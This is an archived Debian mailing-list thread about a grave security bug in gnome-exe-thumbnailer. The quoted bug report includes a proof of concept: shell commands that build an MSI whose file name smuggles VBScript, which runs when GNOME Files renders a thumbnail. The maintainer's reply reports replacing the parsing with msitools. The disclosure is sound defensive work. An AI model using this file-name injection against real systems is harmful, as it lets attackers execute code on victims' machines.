[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript

Tue Jul 18 00:03:27 UTC 2017

Hi Nils,

I wasn't able to reproduce the exploit on my (64-bit) system with either
Caja and Nautilus (it also required setting up a new wineprefix in
~/.wine). The msi thumbnail ended up generating without any version
information tag at all.

Regardless, I've gone and replaced the VBScript-based parsing entirely
with msitools' msiinfo in
https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
hopefully this should fix the issue. I'll tag a new release soon and
look at pushing the fix to Debian.

(Also CC'ing the other maintainers, who I don't think are on the Debian
Wine list)

Best,
James

On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
> Package: gnome-exe-thumbnailer
> Version: 0.9.4-2
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> Dear Maintainer,
> 
> the following PoC is copied verbatim from my post about the parsing issue:
> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
> 
> Proof of Concept
> 
> Install Dependencies
> 
> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
> 
> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
> 
> Create MSI Files
> 
> Create a file named poc.xml with the following content:
> 
> <?xml version="1.0" encoding="utf-8"?>
> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
> <Product Version="1.0"/>
> </Wix>
> 
> Execute the following Bourne Shell code:
> 
> wixl -o poc.msi poc.xml
> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
> 
> Trigger Execution
> 
> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
> 
> *** End of the template - remove these template lines ***
> 
> 
> -- System Information:
> Debian Release: 9.0
>   APT prefers stable
>   APT policy: (500, 'stable')
> Architecture: i386 (i686)
> 
> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: sysvinit (via /sbin/init)
> 
> Versions of packages gnome-exe-thumbnailer depends on:
> ii  icoutils                         0.31.2-1.1
> ii  imagemagick                      8:6.9.7.4+dfsg-11
> ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
> ii  libglib2.0-bin                   2.50.3-2
> 
> Versions of packages gnome-exe-thumbnailer recommends:
> pn  wine                                                                 <none>
> pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>
> 
> gnome-exe-thumbnailer suggests no packages.
> 
> -- no debconf information
> 
> _______________________________________________
> pkg-wine-party mailing list
> pkg-wine-party at lists.alioth.debian.org
> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
> 

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: OpenPGP digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-wine-party/attachments/20170718/adf241f9/attachment.sig>